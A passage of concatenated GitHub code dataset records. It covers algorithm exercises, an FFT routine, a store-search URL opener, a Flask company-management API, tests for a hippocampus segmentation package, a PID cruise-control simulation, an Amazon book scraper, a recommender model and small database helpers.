print(t.__color)\n #print(color())\nprint(f\"Заводим автомобиль♣♥☻☺♦•◘○♠5♣0☺\")\n","repo_name":"nail14/GeekBrains_DZ","sub_path":"home work/DZ_9/DZ_9_1.py","file_name":"DZ_9_1.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13285002777","text":"\"\"\"\nA teacher is writing a test with n true/false questions, with 'T' denoting true and 'F' denoting false. He wants to confuse the students by maximizing the number of consecutive questions with the same answer (multiple trues or multiple falses in a row).\n\nYou are given a string answerKey, where answerKey[i] is the original answer to the ith question. In addition, you are given an integer k, the maximum number of times you may perform the following operation:\n\nChange the answer key for any question to 'T' or 'F' (i.e., set answerKey[i] to 'T' or 'F').\nReturn the maximum number of consecutive 'T's or 'F's in the answer key after performing the operation at most k times.\n\nExample 1:\nInput: answerKey = \"TTFF\", k = 2\nOutput: 4\nExplanation: We can replace both the 'F's with 'T's to make answerKey = \"TTTT\".\nThere are four consecutive 'T's.\n\nExample 2:\nInput: answerKey = \"TFFT\", k = 1\nOutput: 3\nExplanation: We can replace the first 'T' with an 'F' to make answerKey = \"FFFT\".\nAlternatively, we can replace the second 'T' with an 'F' to make answerKey = \"TFFF\".\nIn both cases, there are three consecutive 'F's.\n\nExample 3:\nInput: answerKey = \"TTFTTFTT\", k = 1\nOutput: 5\nExplanation: We can replace the first 'F' to make answerKey = \"TTTTTFTT\"\nAlternatively, we can replace the second 'F' to make answerKey = \"TTFTTTTT\".\nIn both cases, there are five consecutive 'T's.\n\n\nConstraints:\nn == answerKey.length\n1 <= n <= 5 * 10^4\nanswerKey[i] is either 'T' or 'F'\n1 <= k <= n\n\nhints:\n1 Can we use the maximum length at the previous position to help us find the answer for the current position?\n2 Can we use binary search to find the maximum consecutive same answer at every position?\n\nanalysis:\nsliding window for adjustable size\nTC: O(N)\n\"\"\"\nimport collections\n\n\nclass MaximizeTheConfusionOfAnExam:\n def maxConsecutiveAnswers(self, answerKey: str, k: int) -> int:\n letter_cnt = collections.Counter()\n res = s = 0\n for e, c in enumerate(answerKey):\n letter_cnt[c] += 1\n while min(letter_cnt['T'], letter_cnt['F']) > k:\n letter_cnt[answerKey[s]] -= 1\n s += 1\n res = max(res, e - s + 1)\n return res\n","repo_name":"DeanHe/Practice","sub_path":"LeetCodePython/MaximizeTheConfusionOfAnExam.py","file_name":"MaximizeTheConfusionOfAnExam.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6150447499","text":"import numpy as np\nfrom math import pi, sin, cos\n\n\ndef DFT(coeffs):\n n = len(coeffs)\n if n <= 1:\n return coeffs\n A0 = DFT(coeffs[0:: 2])\n T = np.array([(cos(2 * pi * k / n) + 1j * sin(2 * pi * k / n)) \n for k in range(n // 2)])\n A1 = DFT(coeffs[1:: 2]) * T\n return np.hstack((A0 + A1, A0 - A1))\n\n\ncoeffs = list(map(float, input().strip().split()))\nresult = DFT(coeffs)\nprint(' '.join(f'{x.real},{x.imag}' for x in result))","repo_name":"LizaGrebenshchikova/VCS","sub_path":"FFT.py","file_name":"FFT.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14239237059","text":"import logging\nimport platform\nimport subprocess\nimport time\n\nimport click\n\nfrom store_search.stores import QFC, FredMeyer, Safeway, Target, WholeFoods\n\n\nclass Browser:\n logger = logging.getLogger(__name__)\n\n def __init__(self, dry_run=False):\n self.cmd_prefix = None\n self.dry_run = dry_run\n self.configure()\n\n def configure(self):\n p = platform.system()\n if p in [\"Darwin\", \"Linux\"]:\n self.cmd_prefix = [\"open\"]\n elif p in [\"Windows\"]:\n self.cmd_prefix = [\"cmd\", \"/c\", \"start\"]\n\n def open(self, url):\n cmd = self.cmd_prefix + [url]\n self.logger.debug(cmd)\n if not self.dry_run:\n process = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n process.communicate()\n\n\n@click.command()\n@click.option(\"-d\", \"--debug/--no-debug\", default=False)\n@click.option(\"-n\", \"--dry-run/--no-dry-run\", default=False)\n@click.option(\"-p\", \"--pause\", default=0.1, show_default=True, type=float)\n@click.argument(\"product\", nargs=-1)\ndef cli(product, debug, dry_run, pause):\n logger = logging.getLogger(__name__)\n if debug:\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = logging.Formatter(\n \"{%(filename)s:%(lineno)d} %(levelname)s - %(message)s\"\n )\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n target = Target()\n fred = FredMeyer()\n safeway = Safeway(params={\"zipCode\": 98122})\n wf = WholeFoods(params={\"sort\": \"relevance\", \"store\": 10630})\n qfc = QFC()\n\n product = \" \".join(product)\n browser = Browser(dry_run=dry_run)\n logger.debug(\"created brower\")\n store_list = [qfc, fred, target, wf, safeway]\n for i, store in enumerate(store_list):\n url = store.url(product)\n browser.open(url)\n if not dry_run and not i == len(store_list) - 1:\n time.sleep(pause)\n","repo_name":"taylormonacelli/store_search","sub_path":"grocer.py","file_name":"grocer.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15110603379","text":"#!/usr/bin/env python3\nimport sys\nINF = float(\"inf\")\n\n\ndef solve(N: int, K: int, h: \"List[int]\"):\n h.sort()\n print(min(h[i+K-1]-h[i] for i in range(N-K+1)))\n\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n K = int(next(tokens)) # type: int\n h = [int(next(tokens)) for _ in range(N)] # type: \"List[int]\"\n solve(N, K, h)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc115/C/4921315.py","file_name":"4921315.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"5117560217","text":"from flask import Blueprint, request\nfrom ...constants import USER_ID_TAG, COMPANY_ID_TAG, COMPANY_NAME_TAG, COMPANIES_TAG, TOKEN_TAG\nfrom ..models.company import Company\nfrom ..models.mention import Mention\nfrom ..models.site import SiteAssociation\nfrom ..db import insert_rows, delete_rows\nfrom ..responses import ok_response, bad_request_response, data_response\nfrom ..authentication.authenticate import authenticate, enforce_json\nfrom ...mentions_crawler_celery import enqueue\nfrom .job import tasks, get_tasks_id\nfrom celery.result import AsyncResult\n\ncompany_bp = Blueprint(\"companies\", __name__, url_prefix=\"/\")\n\n\n# Route for updating company names\n@company_bp.route(\"/companies\", methods=[\"PUT\"])\n@enforce_json()\n@authenticate()\ndef update_companies(user):\n body = request.get_json()\n if not body.get(COMPANIES_TAG):\n return bad_request_response(\"Invalid fields\")\n names = body.get(COMPANIES_TAG) \n user_id = user.get(USER_ID_TAG)\n token = request.cookies.get(TOKEN_TAG)\n if len(names) == 0:\n return bad_request_response(\"Must have at least one company name\")\n old_companies = Company.query.filter_by(mention_user_id=user_id).all()\n \n old_names = []\n scraped_companies = []\n new_companies = []\n old_mentions = []\n\n for company in old_companies:\n if company.name not in names:\n scraped_companies.append(company)\n old_mentions.extend(Mention.query.filter_by(mention_user_id=user_id,\n company=company.id, favourite=False).all())\n old_names.append(company.name)\n \n for name in names:\n if name not in old_names:\n new_companies.append(Company(user_id, name))\n\n if len(old_mentions) > 0:\n result = delete_rows(old_mentions)\n if result is not True:\n return result\n if len(scraped_companies) > 0:\n result = delete_rows(scraped_companies)\n if result is not True:\n return result\n if len(new_companies) > 0:\n result = insert_rows(new_companies)\n if result is not True:\n return result\n associations = SiteAssociation.query.filter_by(mention_user_id=user_id).all()\n for assoc in associations:\n result = enqueue(assoc.site_name, user_id, token, True)\n if tasks.get(get_tasks_id(assoc.site_name, user_id)) is not None:\n del tasks[get_tasks_id(assoc.site_name, user_id)]\n if isinstance(result, AsyncResult):\n tasks[get_tasks_id(assoc.site_name, user_id)] = result\n return ok_response(\"Company names updated!\")\n\n\n@company_bp.route(\"/companies\", methods=[\"GET\"])\n@authenticate()\ndef get_companies(user):\n companies = Company.query.filter_by(mention_user_id=user.get(USER_ID_TAG))\n company_dicts = []\n for company in companies:\n company_dicts.append({COMPANY_ID_TAG: company.id, COMPANY_NAME_TAG: company.name})\n\n return data_response({COMPANIES_TAG: company_dicts})\n","repo_name":"hatchways/team-ginger","sub_path":"server/mentions_crawler_flask/blueprints/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44114455065","text":"import shutil\nfrom pathlib import Path\n\nimport ants\nimport hsf.engines\nimport hsf.factory\nimport hsf.fetch_models\nimport hsf.multispectrality\nimport hsf.roiloc_wrapper\nimport hsf.segment\nimport hsf.uncertainty\nimport pytest\nimport torch\nfrom hsf import __version__\nfrom omegaconf import DictConfig\n\n\ndef test_version():\n assert __version__ == '1.1.3'\n\n\n# SETUP FIXTURES\n@pytest.fixture(scope=\"session\")\ndef models_path(tmpdir_factory):\n \"\"\"Setup tmpdir.\"\"\"\n url = \"https://zenodo.org/record/6457484/files/arunet_3.0.0_single.onnx?download=1\"\n xxh3 = \"71edec9011f7f304\"\n\n tmpdir_path = tmpdir_factory.mktemp(\"hsf\")\n tmpdir_path = Path(tmpdir_path)\n\n # Copy sample mri\n shutil.copy(\"tests/mri/tse.nii.gz\", tmpdir_path / \"tse.nii.gz\")\n shutil.copy(\"tests/mri/mask.nii.gz\", tmpdir_path / \"mask.nii.gz\")\n\n # Download model\n hsf.fetch_models.fetch(tmpdir_path, \"model.onnx\", url, xxh3)\n\n assert xxh3 == hsf.fetch_models.get_hash(tmpdir_path / \"model.onnx\")\n\n return tmpdir_path\n\n\n@pytest.fixture(scope=\"session\")\ndef config(models_path):\n \"\"\"Setup DictConfig.\"\"\"\n configuration = {\n \"files\": {\n \"path\": str(models_path),\n \"pattern\": \"tse.nii.gz\",\n \"mask_pattern\": None,\n \"output_dir\": \"hsf_outputs\",\n },\n \"hardware\": {\n \"engine\": \"onnxruntime\",\n \"engine_settings\": {\n \"execution_providers\": [[\n \"CUDAExecutionProvider\", {\n \"device_id\": 0,\n \"gpu_mem_limit\": 2147483648\n }\n ], \"CPUExecutionProvider\"],\n \"batch_size\": 1\n }\n },\n \"roiloc\": {\n \"roi\": \"hippocampus\",\n \"contrast\": \"t2\",\n \"margin\": [2, 0, 2]\n },\n \"augmentation\": {\n \"flip\": {\n \"axes\": [\"LR\"],\n \"flip_probability\": 0.5,\n },\n \"affine_probability\": 0.8,\n \"affine\": {\n \"scales\": 0.2,\n \"degrees\": 15,\n \"translation\": 3,\n \"isotropic\": False,\n },\n \"elastic_probability\": 0.20,\n \"elastic\": {\n \"num_control_points\": 4,\n \"max_displacement\": 4,\n \"locked_borders\": 0\n },\n },\n \"multispectrality\": {\n \"pattern\": None,\n \"same_space\": True,\n \"registration\": {\n \"type_of_transform\": \"AffineFast\"\n }\n },\n \"segmentation\": {\n \"ca_mode\": \"1/2/3\",\n \"models_path\": str(models_path),\n \"models\": {\n \"model.onnx\": {\n \"url\":\n \"https://zenodo.org/record/6457484/files/arunet_3.0.0_single.onnx?download=1\",\n \"xxh3_64\":\n \"71edec9011f7f304\"\n }\n },\n \"segmentation\": {\n \"test_time_augmentation\": True,\n \"test_time_num_aug\": 5\n }\n },\n }\n\n return DictConfig(configuration)\n\n\n@pytest.fixture(scope=\"session\")\ndef deepsparse_inference_engines(models_path):\n \"\"\"Tests that models can be loaded using DeepSparse\"\"\"\n settings = DictConfig({\"num_cores\": 0, \"batch_size\": 2})\n\n engines = hsf.engines.get_inference_engines(models_path,\n engine_name=\"deepsparse\",\n engine_settings=settings)\n\n return list(engines)\n\n\n# TESTS\n# Main script called by the `hsf` command\ndef test_main(config):\n \"\"\"Tests that the main script can be called.\"\"\"\n hsf.engines.print_deepsparse_support()\n hsf.factory.main(config)\n\n\ndef test_main_compute_uncertainty(models_path):\n \"\"\"Tests that the main script can compute uncertainty.\"\"\"\n soft_pred = torch.randn(5, 6, 448, 30, 448)\n soft_pred = torch.softmax(soft_pred, dim=1)\n\n hsf.factory.compute_uncertainty(models_path / \"tse.nii.gz\", soft_pred)\n\n\n# fetch_models\ndef test_fetch_models(models_path, config):\n \"\"\"Tests that models can be (down)loaded\"\"\"\n # Delete the model if it exists\n filepath = models_path / \"model.onnx\"\n filepath.unlink()\n\n with filepath.open(\"w\", encoding=\"utf-8\") as f:\n f.write(\"Dummy model with wrong hash\")\n\n # Redownload when wrong hash\n hsf.fetch_models.fetch_models(models_path, config.segmentation.models)\n\n\n# # ROILoc\ndef test_roiloc(models_path):\n \"\"\"Tests that we can locate and save hippocampi.\"\"\"\n mris = hsf.roiloc_wrapper.load_from_config(models_path, \"tse.nii.gz\")\n assert mris\n\n mri, mask = hsf.roiloc_wrapper.get_mri(mris[0], mask_pattern=\"mask.nii.gz\")\n assert isinstance(mask, ants.ANTsImage)\n mri, mask = hsf.roiloc_wrapper.get_mri(mris[0],\n mask_pattern=\"no_mask.nii.gz\")\n assert isinstance(mri, ants.ANTsImage)\n assert mask == None\n\n _, right, left = hsf.roiloc_wrapper.get_hippocampi(mri, {\n \"contrast\": \"t2\",\n \"margin\": [2, 0, 2],\n \"roi\": \"hippocampus\"\n }, mask)\n\n assert isinstance(right, ants.ANTsImage)\n assert isinstance(left, ants.ANTsImage)\n\n # Saving to {tmpdir}/tse_{side}_hippocampus.nii.gz\n hsf.roiloc_wrapper.save_hippocampi(right, left, models_path, mris[0])\n\n\n# Segmentation\ndef test_segment(models_path, config, deepsparse_inference_engines):\n \"\"\"Tests that we can segment and save a hippocampus.\"\"\"\n mri = models_path / \"tse_right_hippocampus.nii.gz\"\n sub = hsf.segment.mri_to_subject(mri)\n sub = [sub, sub]\n\n for ca_mode in [\"1/23\", \"123\", \"\"]:\n _, pred = hsf.segment.segment(\n subjects=sub,\n augmentation_cfg=config.augmentation,\n segmentation_cfg=config.segmentation.segmentation,\n n_engines=1,\n engines=deepsparse_inference_engines,\n ca_mode=ca_mode,\n batch_size=2)\n\n hsf.segment.save_prediction(mri, pred)\n\n\ndef test_multispectrality(models_path):\n \"\"\"Tests that we can co-locate hippocampi in another contrast.\"\"\"\n config = DictConfig({\n \"files\": {\n \"output_dir\": str(models_path)\n },\n \"multispectrality\": {\n \"pattern\": \"tse.nii.gz\",\n \"same_space\": False,\n \"registration\": {\n \"type_of_transform\": \"AffineFast\"\n }\n }\n })\n\n mri = hsf.roiloc_wrapper.load_from_config(models_path, \"tse.nii.gz\")[0]\n second_contrast = hsf.multispectrality.get_second_contrast(\n mri, \"tse.nii.gz\")\n\n registered = hsf.multispectrality.register(\n mri, second_contrast,\n DictConfig({\"multispectrality\": {\n \"same_space\": True\n }}))\n registered = hsf.multispectrality.register(mri, second_contrast, config)\n\n img = ants.image_read(str(mri), reorient=\"LPI\")\n locator, _, _ = hsf.roiloc_wrapper.get_hippocampi(img, {\n \"contrast\": \"t2\",\n \"margin\": [2, 0, 2],\n \"roi\": \"hippocampus\"\n }, None)\n\n _, _ = hsf.multispectrality.get_additional_hippocampi(\n mri, registered, locator, config)\n\n\ndef test_uncertainty():\n \"\"\"Tests that uncertainty can be computed.\"\"\"\n n_classes = 1\n sample_probs = torch.randn(1, n_classes, 16, 16, 16)\n\n unc = hsf.uncertainty.voxelwise_uncertainty(sample_probs)\n\n assert unc.shape == (16, 16, 16)\n","repo_name":"clementpoiret/HSF","sub_path":"tests/test_hsf.py","file_name":"test_hsf.py","file_ext":"py","file_size_in_byte":7436,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"13968784458","text":"import pandas as pd\n\n\nm_car = 300 # kg\nmax_F = 8000 # N\nmin_F = -8000 # N\ndelay_factor = 0.5\ncda = 0.4 # drag coefficient\nrf = 0.05 # rolling resistance\n\nKp = 2\nKi = 0.1\nmax_error_int = 10\ntarget_speed_list = [50, 100, 0, 70] # km/h\n\ndt = 0.1 # sec\nresponce = 5 # How often does the system respond (once per responce)\nsim_time = 15 # sec\nresponce_period = responce * dt\n\ntarget_speed_mode = 1\nstate_log =[]\n\n\ndef main():\n df = None\n error_int = 0\n state = {\n 'time': 0,\n 'speed': 0,\n 'force': 0,\n 'acc': 0,\n 'force_drag': 0\n }\n count = 0\n target_speed_base = target_speed_list[count % 4]\n break_time = sim_time\n log_list = []\n score = 0\n \n current_responce = 0\n \n while count < 8:\n if state['time'] > break_time:\n break_time += sim_time\n count += 1\n target_speed_base = target_speed_list[count % 4]\n \n if state[\"time\"] >= current_responce:\n current_responce += responce_period\n target_speed = target_speed_base\n error = target_speed - state['speed']\n error_int += error * responce_period\n score += abs(error * responce_period)\n # error_int = max(min(error_int, max_error_int), -max_error_int)\n P_action = Kp * error\n I_action = Ki * error_int\n \n throttle = P_action + I_action\n \n target_force = throttle / 100 * max_F\n \n # car simulator\n state = sim_car(target_force, state)\n \n # log data\n log_dict = {\n **state,\n 'error': error,\n 'error_int': error_int,\n 'P_action': P_action,\n 'I_action': I_action,\n 'target_force': target_force,\n 'target_speed': target_speed\n }\n log_list.append(log_dict)\n \n \n \n key_list = []\n for key in log_dict.keys():\n key_list.append(key)\n pd.DataFrame(log_list, columns=key_list).to_csv(\"data.csv\", header=key_list)\n \n print(\"The final score is: %f\" % score)\n \n\n\ndef sim_car(target_force, state):\n \n # add delay factor to simulate engine\n force = state['force'] * delay_factor + target_force * (1 - delay_factor)\n force = max(min(force, max_F), min_F)\n \n velocity = state['speed'] / 3.6\n \n # drag force\n force_drag = (0.5 * 1.225 * velocity * velocity * cda + rf * m_car * 9.81) * sign(velocity)\n \n acc = (force - force_drag) / m_car\n velocity += acc * dt\n \n state['time'] += dt\n state['force'] = force\n state['speed'] = velocity * 3.6\n state['acc'] = acc\n state['force_drag'] = force_drag\n \n return state\n\n\ndef sign(x):\n return 1 if x >= 0 else -1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gpeteinatos/PID","sub_path":"cruise_control.py","file_name":"cruise_control.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13066830326","text":"\n\nimport datetime\nimport re\nimport time\nimport urllib.request\n\n\nimport re\nimport requests\nimport pymysql\nfrom requests.exceptions import RequestException\nfrom lxml import etree\nimport pymysql\n\nfrom selenium import webdriver\n\n\ndef get_one_page(url):\n driver = webdriver.Chrome()\n\n driver.get(url)\n html = driver.page_source\n driver.quit()\n return html\n\n\n\n\ndef Python_sel_Mysql():\n # 使用cursor()方法获取操作游标\n connection = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='123456', db='Amazon',\n charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n cur = connection.cursor()\n #sql 语句\n try:\n\n for i in range(1,888):\n sql = 'select f_blink from Final_linkTable where id = %s ' % i\n # #执行sql语句\n cur.execute(sql)\n # #获取所有记录列表\n data = cur.fetchone()\n book_link = data['f_blink']\n yield book_link\n except :\n print(\"放过去\")\n\n\n\ndef parse_page1(html):\n selector = etree.HTML(html)\n book_name = selector.xpath('//*[@id=\"ebooksProductTitle\"]/text()')\n author = selector.xpath('//*[@id=\"buybox\"]/div/table/tbody/tr[2]/td[2]/text()')\n r_book_name = remove_block(book_name)\n r_author = remove_block(author)\n\n\n\n book_name1 = if_isnull(r_book_name)\n author1 = if_isnull(r_author)\n return r_book_name,r_author\n # for i1,i2 in zip(book_name1,author1):\n\n\n\n\ndef remove_block(items):\n new_items = []\n for it in items:\n f = \"\".join(it.split())\n new_items.append(f)\n return new_items\n\n\n\ndef if_isnull(content):\n if_list =[]\n\n if content ==None:\n f_content = ''\n if_list.append(f_content)\n else:\n\n f_content =content\n if_list = f_content\n return if_list\n\ntest_list = ['https://www.amazon.cn/dp/B07K9MM446',\n 'https://www.amazon.cn/dp/B07QYM82RQ',\n 'https://www.amazon.cn/dp/B07SFTNKLS']\n\nif __name__ == '__main__':\n\n # for url_str in Python_sel_Mysql():\n for url_str in test_list:\n html = get_one_page(url_str)\n content =parse_page1(html)\n print(content)\n\n\n\n","repo_name":"mojoru2023/ProjectFor_Spiders","sub_path":"async_aiohttp_Test/Test16.py","file_name":"Test16.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24442953128","text":"\"\"\"\nProject 3: Closest Pairs and Clustering Algorithms\n\"\"\"\nimport math\nimport alg_cluster\n\n######################### Code for closest pairs of clusters #########################\n\n\ndef pair_distance(cluster_list, idx1, idx2):\n \"\"\"\n Helper function that computes Euclidean distance between two clusters in a list\n Input: cluster_list is list of clusters, idx1 and idx2 are integer indices for two clusters\n Output: tuple (dist, idx1, idx2) where dist is distance between cluster_list[idx1] and cluster_list[idx2]\n \"\"\"\n return (cluster_list[idx1].distance(cluster_list[idx2]), min(idx1, idx2), max(idx1, idx2))\n\n\ndef slow_closest_pair(cluster_list):\n \"\"\"\n Compute the distance between the closest pair of clusters in a list (slow)\n Input: cluster_list is the list of clusters\n \n Output: tuple of the form (dist, idx1, idx2) where the centers of cluster_list[idx1] and cluster_list[idx2] have minimum distance dist. \n \"\"\"\n if len(cluster_list) <= 1:\n return (0, 0, 0)\n minimum_distance = float('inf')\n idx1, idx2 = -1, -1\n for cluster_index, cluster in enumerate(cluster_list):\n for other_cluster_index, other_cluster in enumerate(cluster_list[cluster_index+1:], cluster_index+1):\n if cluster_index != other_cluster_index:\n current_distance = cluster.distance(other_cluster)\n if current_distance < minimum_distance:\n minimum_distance = current_distance\n idx1, idx2 = cluster_index, other_cluster_index\n return (minimum_distance, idx1, idx2)\n\n\ndef get_min_tuple(tuple_a, tuple_b):\n '''\n return the tuple with smalles first entry\n '''\n temporary_list = [tuple_a, tuple_b]\n temporary_list.sort(key=lambda x: x[0])\n return temporary_list[0]\n\n\ndef fast_closest_pair(cluster_list):\n \"\"\"\n Compute the distance between the closest pair of clusters in a list\n Input: cluster_list is list of clusters SORTED such that horizontal positions of their centers are in ascending order\n Output: tuple of the form (dist, idx1, idx2) where the centers of cluster_list[idx1] and cluster_list[idx2] have minimum distance dist. \n \"\"\"\n cluster_count = len(cluster_list)\n if cluster_count <= 3:\n return slow_closest_pair(cluster_list)\n else:\n mid_position = int(cluster_count // 2)\n left_list = cluster_list[: mid_position]\n right_list = cluster_list[mid_position:]\n mid = 0.5 * (left_list[-1].horiz_center() +\n right_list[0].horiz_center())\n left_tuple = fast_closest_pair(left_list)\n right_dist, right_id1, right_id2 = fast_closest_pair(right_list)\n right_tuple = (right_dist, right_id1 + mid_position,\n right_id2 + mid_position)\n min_tuple = get_min_tuple(left_tuple, right_tuple)\n strip_tuple = closest_pair_strip(cluster_list, mid, min_tuple[0])\n min_tuple = get_min_tuple(min_tuple, strip_tuple)\n return min_tuple\n\n\ndef closest_pair_strip(cluster_list, horiz_center, half_width):\n \"\"\"\n Helper function to compute the closest pair of clusters in a vertical strip\n Input: cluster_list is a list of clusters produced by fast_closest_pair\n horiz_center is the horizontal position of the strip's vertical center line\n half_width is the half the width of the strip (i.e; the maximum horizontal distance that a cluster can lie from the center line)\n Output: tuple of the form (dist, idx1, idx2) where the centers of cluster_list[idx1] and cluster_list[idx2] lie in the strip and have minimum distance dist. \n \"\"\"\n defalut_tuple = (float('inf'), -1, -1)\n in_strip_pair = [(index, cluster) for index, cluster in enumerate(cluster_list)\n if abs(cluster.horiz_center() - horiz_center) < half_width]\n\n in_strip_pair.sort(key=lambda pair: pair[1].vert_center())\n if len(in_strip_pair) <= 1:\n return defalut_tuple\n\n in_strip_index, in_strip = zip(*in_strip_pair)\n for cluster_index, cluster in enumerate(in_strip[:-1]):\n other_loop = in_strip[cluster_index+1: cluster_index+4]\n for other_cluster_index, other_cluster in enumerate(other_loop, cluster_index+1):\n current_distance = cluster.distance(other_cluster)\n if current_distance < defalut_tuple[0]:\n defalut_tuple = (current_distance,\n cluster_index, other_cluster_index)\n\n id_original = (in_strip_index[defalut_tuple[1]],\n in_strip_index[defalut_tuple[2]])\n defalut_tuple = (defalut_tuple[0], min(id_original), max(id_original))\n return defalut_tuple\n\n######################### Code for hierarchical clustering ###########################\n\n\ndef hierarchical_clustering(cluster_list, num_clusters):\n \"\"\"\n Compute a hierarchical clustering of a set of clusters. Note that the function may mutate cluster_list\n Input: List of clusters, integer number of clusters\n Output: List of clusters whose length is num_clusters\n \"\"\"\n cluster_list_copy = [clu.copy() for clu in cluster_list]\n cluster_count = len(cluster_list)\n while cluster_count > num_clusters:\n cluster_list_copy.sort(key=lambda clu: clu.horiz_center())\n _, id1, id2 = fast_closest_pair(cluster_list_copy)\n cluster_list_copy[id1].merge_clusters(cluster_list_copy.pop(id2))\n cluster_count -= 1\n\n return cluster_list_copy\n\n######################### Code for k-means clustering ################################\n\n\ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\n \"\"\"\n Compute the k-means clustering of a set of clusters. Note that the function may not mutate cluster_list\n Input: List of clusters, integers number of clusters and number of iterations\n Output: List of clusters whose length is num_clusters\n \"\"\"\n # position initial clusters at the location of clusters with largest populations\n cluster_list_copy, id_population_pair = zip(*[(clu.copy(), (index, clu.total_population()))\n for index, clu in enumerate(cluster_list)])\n id_population_pair = list(id_population_pair)\n id_population_pair.sort(key=lambda x: -x[1])\n initial_cluster = [cluster_list_copy[id_population_pair[pair_id][0]]\n for pair_id in xrange(num_clusters)]\n\n for dummy_iter in xrange(num_iterations):\n initial_cluster = [alg_cluster.Cluster(set([]), clu.horiz_center(\n ), clu.vert_center(), 0, 0) for clu in initial_cluster]\n\n holder_cluster = [clu.copy() for clu in initial_cluster]\n for cluster in cluster_list_copy:\n initial_cluster_dist_id = [(index, cluster.distance(\n clu)) for index, clu in enumerate(initial_cluster)]\n initial_cluster_dist_id.sort(key=lambda x: x[1])\n min_id = initial_cluster_dist_id[0][0]\n holder_cluster[min_id].merge_clusters(cluster)\n\n initial_cluster = holder_cluster\n return initial_cluster\n","repo_name":"mohdsinad/Algorithmic_Thinking_Coursera_RiceUni","sub_path":"Week 6/Closest Pairs and Clustering Algorithms.py","file_name":"Closest Pairs and Clustering Algorithms.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28738030490","text":"import gc\n\nimport numpy as np\nfrom scipy import linalg\n\nfrom ..definitions import InteractionMatrix\nfrom ..optimization.parameter_range import LogUniformFloatRange\nfrom .base import BaseSimilarityRecommender, RecommenderConfig\n\n\nclass DenseSLIMConfig(RecommenderConfig):\n reg: float = 1\n\n\nclass DenseSLIMRecommender(BaseSimilarityRecommender):\n \"\"\"Implementation of DenseSLIM or Embarrassingly Shallow AutoEncoder (EASE ^R).\n\n See:\n\n - `Embarrassingly Shallow Autoencoders for Sparse Data\n `_\n\n Args:\n X_train_all (Union[scipy.sparse.csr_matrix, scipy.sparse.csc_matrix]):\n Input interaction matrix.\n\n reg (float, optional):\n The regularization parameter for ease. Defaults to 1.0.\n \"\"\"\n\n default_tune_range = [LogUniformFloatRange(\"reg\", 1, 1e4)]\n config_class = DenseSLIMConfig\n\n def __init__(self, X_train_all: InteractionMatrix, reg: float = 1):\n\n super(DenseSLIMRecommender, self).__init__(X_train_all)\n self.reg = reg\n\n def _learn(self) -> None:\n X_train_all_f32 = self.X_train_all.astype(np.float32)\n P = X_train_all_f32.T.dot(X_train_all_f32)\n P_dense: np.ndarray = P.todense()\n del P\n P_dense[np.arange(self.n_items), np.arange(self.n_items)] += self.reg\n gc.collect()\n P_dense = linalg.inv(P_dense, overwrite_a=True)\n\n gc.collect()\n diag_P_inv = 1 / np.diag(P_dense)\n P_dense *= -diag_P_inv[np.newaxis, :]\n range_ = np.arange(self.n_items)\n P_dense[range_, range_] = 0\n self._W = P_dense\n","repo_name":"tohtsky/irspack","sub_path":"src/irspack/recommenders/dense_slim.py","file_name":"dense_slim.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"33600498605","text":"import sqlite3\n\n# class Database: This class contains the SQL connection & cursor\nclass Database (object):\n \"\"\" Database object:\n Contains the SQL database Connection and Cursor\"\"\"\n\n def __init__(self):\n self.filename = None\n self.conn = None\n self.cursor = None\n\n def open_db (self, filename = 'oyd_daily.db'):\n \"\"\" Database Object: open_db method\n Opens the SQL database\n Parameters: database - default 'rooster.db'\n Returns: Connection, Cursor - for the SQL database\"\"\"\n\n self.filename = filename\n\n try:\n self.conn = sqlite3.connect(filename)\n except:\n print(f\"ERROR: unable to open database: {filename}\")\n exit(1)\n\n # get the cursor for the database\n self.cursor = self.conn.cursor()\n\n return 0\n\n def close_db (self):\n try:\n self.conn.close()\n self.conn = None\n self.cursor = None\n return 0\n except:\n return 1\n","repo_name":"skapoor8/python","sub_path":"projects/DailyDataAPI/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20443410198","text":"\"\"\"Add tx_retries table\n\nRevision ID: 0704901102eb\nRevises: 5cebc0f48f6e\nCreate Date: 2021-08-02 21:46:46.095406\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, 